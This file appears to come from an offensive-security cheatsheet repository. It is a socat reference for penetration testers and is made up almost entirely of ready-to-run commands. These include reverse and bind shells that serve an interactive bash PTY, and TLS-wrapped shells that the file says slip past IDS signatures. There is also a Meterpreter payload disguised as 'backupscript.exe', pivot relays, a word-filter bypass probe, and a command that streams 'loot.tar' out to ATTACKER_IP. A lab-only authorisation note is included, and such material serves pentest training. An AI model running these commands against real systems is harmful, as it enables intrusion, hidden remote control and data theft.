daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

socat.md (9854B)


      1 ---
      2 title: "Socat"
      3 description: "Socat recipes for bind/reverse shells, TCP/UDP relays, TLS-wrapped tunnels, port forwarding and file transfer."
      4 category: tunneling-pivoting
      5 tags: ["tunneling-pivoting", "relay", "pivoting", "tunneling"]
      6 tools: ["Nmap", "Metasploit", "Meterpreter", "socat", "OpenSSL"]
      7 difficulty: intermediate
      8 updated: "2026-08-28"
      9 source: "vault:Tools/Socat-Cheatsheet.md"
     10 ---
     11 # Socat — Cheat Sheet
     12 
     13 ## Summary
     14 
     15 `socat` (SOcket CAT) is a bidirectional relay that connects any two data channels, sockets, files, pipes, PTYs, TLS tunnels, and processes, and pumps bytes between them. In offensive work it earns its place three ways: as a hardened catcher for reverse and bind shells (including fully interactive PTYs), as an encrypted transport that survives IDS inspection, and as a dependency-free redirector for pivoting when SSH is not available on the foothold. This sheet is a fast lookup for the exact command shapes, with the small flags that make the difference between a dumb shell and a stable one.
     16 
     17 > [!danger]+ Authorisation Boundary
     18 >
     19 > 1. Use only against **Hack The Box**, lab, or explicitly authorised targets.
     20 > 2. Shells and relays cross network boundaries. Stay in scope and remove listeners, relays, and dropped binaries when finished.
     21 
     22 ---
     23 
     24 ## Conceptual Information
     25 
     26 ### Address syntax
     27 
     28 Every socat invocation is `socat [options] <address1> <address2>`. socat opens both addresses and shuttles data between them. An address is a type plus comma-separated options, for example `TCP4-LISTEN:4444,fork,reuseaddr`.
     29 
     30 | Address type | Meaning |
     31 |---|---|
     32 | `TCP4-LISTEN:PORT` | Listen for an inbound TCP connection |
     33 | `TCP4:HOST:PORT` | Make an outbound TCP connection |
     34 | `UDP4-LISTEN:PORT` / `UDP4:H:P` | UDP equivalents |
     35 | `EXEC:'cmd',...` | Run a program and wire its stdio to the other address |
     36 | `FILE:` `` `tty` ``,raw,echo=0 | Attach the operator's own terminal |
     37 | `OPENSSL:H:P` / `OPENSSL-LISTEN:P` | TLS-wrapped connection |
     38 | `STDIO` / `-` | Standard input/output |
     39 
     40 | Common option | Effect |
     41 |---|---|
     42 | `fork` | Handle each new connection in a child, so the listener survives disconnects |
     43 | `reuseaddr` | Rebind the port immediately without waiting out TIME_WAIT |
     44 | `pty` | Allocate a pseudo-terminal for the executed program |
     45 | `stderr` | Merge the program's stderr into the channel |
     46 | `setsid` | Run in a new session so job control and signals behave |
     47 | `sigint,sane` | Forward Ctrl-C and reset sane terminal settings |
     48 | `raw,echo=0` | Put the local terminal in raw mode with no local echo |
     49 
     50 > [!info]+ [socat](http://www.dest-unreach.org/socat/doc/socat.html) Overview
     51 >
     52 > A multipurpose relay for bidirectional byte streams between two independent channels.
     53 > 1. Needs no SSH daemon or credentials on a pivot host, only the ability to run the binary.
     54 > 2. Wraps shells in a real PTY, giving arrow keys, tab-completion, and job control that plain `nc` cannot.
     55 > 3. Speaks TLS natively, so shell traffic can be encrypted end to end.
     56 
     57 ---
     58 
     59 ## Reverse Shells
     60 
     61 The target connects back to you. Best when the target can reach out but you cannot reach in.
     62 
     63 ```bash
     64 # Attacker: listener that hands the connection to your own terminal
     65 socat -d -d TCP4-LISTEN:4444,fork,reuseaddr FILE:`tty`,raw,echo=0
     66 ```
     67 
     68 ```bash
     69 # Target: connect back with an interactive bash PTY
     70 socat TCP4:ATTACKER_IP:4444 EXEC:'bash',pty,stderr,setsid,sigint,sane
     71 ```
     72 
     73 > [!info]+ Command Breakdown
     74 >
     75 > 1. `-d -d` raises verbosity so you see connection events, handy while debugging.
     76 > 2. `FILE:`` `tty` ``,raw,echo=0` binds your live terminal in raw mode, this is what makes the caught shell fully interactive.
     77 > 3. `EXEC:'bash',pty,stderr,setsid,sigint,sane` on the target spawns bash inside a PTY, forwards stderr, starts a new session, and keeps Ctrl-C and terminal settings sane.
     78 
     79 > [!success]+ Why this beats nc
     80 >
     81 > 1. You get a real TTY: tab-completion, `su`/`sudo` prompts that need a terminal, `vi`, and job control all work.
     82 > 2. No need for the manual `python3 -c 'pty.spawn'` upgrade dance.
     83 
     84 ---
     85 
     86 ## Bind Shells
     87 
     88 The target listens, you connect in. Best when the target accepts inbound connections but cannot call out.
     89 
     90 ```bash
     91 # Target: listen and serve a bash PTY to whoever connects
     92 socat TCP4-LISTEN:4444,fork,reuseaddr EXEC:'bash',pty,stderr,setsid,sigint,sane
     93 ```
     94 
     95 ```bash
     96 # Attacker: connect and attach your terminal
     97 socat FILE:`tty`,raw,echo=0 TCP4:TARGET_IP:4444
     98 ```
     99 
    100 > [!info]+ Command Breakdown
    101 >
    102 > 1. The listen/exec sides are simply swapped compared with the reverse shell.
    103 > 2. `fork` keeps the target listener alive across reconnects, drop it for a strict one-shot.
    104 
    105 ---
    106 
    107 ## Encrypted Shells (TLS)
    108 
    109 Wrap the whole shell in TLS so an IDS sees only opaque ciphertext. Generate a cert once, then use `OPENSSL` addresses on both ends.
    110 
    111 ```bash
    112 # Attacker: generate a self-signed cert + key, bundle to a .pem
    113 openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt \
    114   -subj "/CN=update.local"
    115 cat shell.key shell.crt > shell.pem
    116 ```
    117 
    118 ```bash
    119 # Attacker: TLS listener
    120 socat -d -d OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork FILE:`tty`,raw,echo=0
    121 ```
    122 
    123 ```bash
    124 # Target: TLS connect-back with a PTY bash
    125 socat OPENSSL:ATTACKER_IP:4444,verify=0 EXEC:'bash',pty,stderr,setsid,sigint,sane
    126 ```
    127 
    128 > [!warning]+ Encryption notes
    129 >
    130 > 1. `verify=0` disables certificate validation, fine for a lab, but it means no protection against interception. Use pinned certs for anything real.
    131 > 2. TLS-wrapped shells defeat signature-based network detection that keys on plaintext shell prompts and commands.
    132 > 3. Only the `.pem` (key + cert) is needed on the listener side, the target just needs to trust-skip with `verify=0`.
    133 
    134 ---
    135 
    136 ## Redirection & Pivoting
    137 
    138 socat as a relay: forward a port on a pivot host on to somewhere the attacker cannot reach directly. No SSH required.
    139 
    140 ```bash
    141 # On the pivot: forward every inbound 8080 connection on to the attacker's 80
    142 socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
    143 ```
    144 
    145 ```bash
    146 # On the pivot: forward inbound 8080 to an internal host's bind port 8443
    147 socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
    148 ```
    149 
    150 > [!info]+ Command Breakdown
    151 >
    152 > 1. `TCP4-LISTEN:8080,fork` accepts many concurrent connections on the pivot, `fork` is essential for more than one.
    153 > 2. For a **reverse** shell through a pivot, point the payload's `LHOST` at the *pivot's* internal IP, socat completes the hop to your listener.
    154 > 3. For a **bind** shell through a pivot, point the Metasploit handler's `RHOST` at the *pivot*, socat completes the hop to the target's listener.
    155 
    156 > [!example]+ Metasploit through a socat redirector
    157 >
    158 > ```bash
    159 > # reverse_https payload aimed at the pivot, socat relays to your real handler
    160 > msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 LPORT=8080 \
    161 >   -f exe -o backupscript.exe
    162 > # handler on the attack host
    163 > # set payload windows/x64/meterpreter/reverse_https ; set lhost 0.0.0.0 ; set lport 80 ; run
    164 > ```
    165 
    166 ---
    167 
    168 ## File Transfer
    169 
    170 ```bash
    171 # Receiver (attacker): write incoming bytes to a file
    172 socat -u TCP4-LISTEN:9000,reuseaddr OPEN:loot.tar,creat
    173 
    174 # Sender (target): stream a file out
    175 socat -u FILE:/tmp/loot.tar TCP4:ATTACKER_IP:9000
    176 ```
    177 
    178 > [!tip]+ Transfer flags
    179 >
    180 > 1. `-u` is unidirectional (address1 to address2 only), the natural fit for a one-way copy.
    181 > 2. `OPEN:file,creat` creates the destination, add `,append` to concatenate.
    182 > 3. TLS file transfer is the same with `OPENSSL`/`OPENSSL-LISTEN` addresses.
    183 
    184 ---
    185 
    186 ## Getting socat onto a Target
    187 
    188 > [!tip]+ When socat is not installed
    189 >
    190 > 1. Check first with a filter-safe probe, e.g. `which socat` (split the name if a word filter is in play: `'w'h'i'ch${IFS}socat`).
    191 > 2. Grab a [statically compiled socat binary](https://github.com/andrew-d/static-binaries) and drop it via your existing RCE or file-transfer channel, then `chmod +x`.
    192 > 3. If neither works, fall back to `ncat --ssl --sh-exec` (ships with Nmap) for a comparable encrypted shell.
    193 
    194 ---
    195 
    196 ## Quick Reference
    197 
    198 | Goal | Attacker | Target |
    199 |---|---|---|
    200 | Reverse shell | `socat -d -d TCP4-LISTEN:4444,fork FILE:`` `tty` ``,raw,echo=0` | `socat TCP4:IP:4444 EXEC:'bash',pty,stderr,setsid,sigint,sane` |
    201 | Bind shell | `socat FILE:`` `tty` ``,raw,echo=0 TCP4:IP:4444` | `socat TCP4-LISTEN:4444,fork EXEC:'bash',pty,stderr,setsid,sigint,sane` |
    202 | Encrypted rev | `socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork FILE:`` `tty` ``,raw,echo=0` | `socat OPENSSL:IP:4444,verify=0 EXEC:'bash',pty,...` |
    203 | Port redirect | `socat TCP4-LISTEN:8080,fork TCP4:INTERNAL:PORT` (on pivot) | connect to pivot:8080 |
    204 | File pull | `socat -u TCP4-LISTEN:9000 OPEN:loot,creat` | `socat -u FILE:loot TCP4:IP:9000` |
    205 
    206 ---
    207 
    208 ## Lessons Learned
    209 
    210 1. `FILE:`` `tty` ``,raw,echo=0` on your side plus `EXEC:'bash',pty,stderr,setsid,sigint,sane` on the target is the canonical fully-interactive shell, memorise it.
    211 2. `fork` on any listener is what lets it survive reconnects, forgetting it gives you exactly one shot per run.
    212 3. TLS (`OPENSSL`) shells encrypt traffic end to end and slip past plaintext signatures, a cheap evasion upgrade over `nc`.
    213 4. For pivoting, the relay direction flips between reverse and bind shells: for reverse, socat sits between target and your listener, for bind, between your handler and the target's listener.
    214 5. socat needs no SSH or credentials on the pivot, only the ability to execute the binary, which makes it ideal after a limited RCE or web shell.
    215 
    216 ---
    217 
    218 ## References
    219 
    220 1. [socat man page](http://www.dest-unreach.org/socat/doc/socat.html)
    221 2. [HTB Academy — Pivoting, Tunneling and Port Forwarding](https://academy.hackthebox.com/module/details/158)
    222 3. [static-binaries — prebuilt socat](https://github.com/andrew-d/static-binaries)
    223 4. [Ncat Users' Guide](https://nmap.org/ncat/guide/index.html)
    224 5. [GTFOBins — socat](https://gtfobins.github.io/gtfobins/socat/)